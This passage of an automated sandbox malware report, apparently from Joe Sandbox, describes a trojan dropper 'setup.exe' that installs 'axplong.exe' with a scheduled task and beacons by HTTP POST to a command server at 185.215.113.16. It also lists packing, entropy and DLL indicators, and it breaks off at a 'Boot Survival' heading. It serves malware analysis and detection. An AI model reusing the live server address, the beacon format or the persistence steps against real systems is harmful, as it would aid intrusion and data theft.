                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00A7BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,13_2_00A7BD60
                  Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php%
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&i
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpHja
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpIif
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpU
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpY
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpa
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedS
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpmkB
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                  Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedt

                  System Summary

                  barindex
                  PE file contains section with special chars
                  Source: setup.exeStatic PE information: section name:
                  Source: setup.exeStatic PE information: section name: .idata
                  Source: setup.exeStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00A74CF013_2_00A74CF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AB306813_2_00AB3068
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00A7E44013_2_00A7E440
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AA7D8313_2_00AA7D83
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00A74AF013_2_00A74AF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AB765B13_2_00AB765B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AB2BD013_2_00AB2BD0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AB872013_2_00AB8720
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AB6F0913_2_00AB6F09
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AB777B13_2_00AB777B
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe EE170A14D676B69CAB768F8A94E482EE9AD6DC1766038D6E26C24FE2CFBD7677
                  Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: setup.exeStatic PE information: Section: ZLIB complexity 0.9973284230245232
                  Source: setup.exeStatic PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9973284230245232
                  Source: axplong.exe.0.drStatic PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user~1\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: setup.exeReversingLabs: Detection: 55%
                  Source: setup.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                  Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: setup.exeStatic file information: File size 1939456 > 1048576
                  Source: setup.exeStatic PE information: Raw size of etmksbbt is bigger than: 0x100000 < 0x1a7e00

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 0.2.setup.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 4.2.axplong.exe.a70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 13.2.axplong.exe.a70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1e7836 should be: 0x1e246a
                  Source: setup.exeStatic PE information: real checksum: 0x1e7836 should be: 0x1e246a
                  Source: setup.exeStatic PE information: section name:
                  Source: setup.exeStatic PE information: section name: .idata
                  Source: setup.exeStatic PE information: section name:
                  Source: setup.exeStatic PE information: section name: etmksbbt
                  Source: setup.exeStatic PE information: section name: iosnleeh
                  Source: setup.exeStatic PE information: section name: .taggant
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: etmksbbt
                  Source: axplong.exe.0.drStatic PE information: section name: iosnleeh
                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00A8D84C push ecx; ret 13_2_00A8D85F
                  Source: setup.exeStatic PE information: section name: entropy: 7.979174049479235
                  Source: setup.exeStatic PE information: section name: etmksbbt entropy: 7.953652307689506
                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.979174049479235
                  Source: axplong.exe.0.drStatic PE information: section name: etmksbbt entropy: 7.953652307689506
                  Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                  Boot Survival

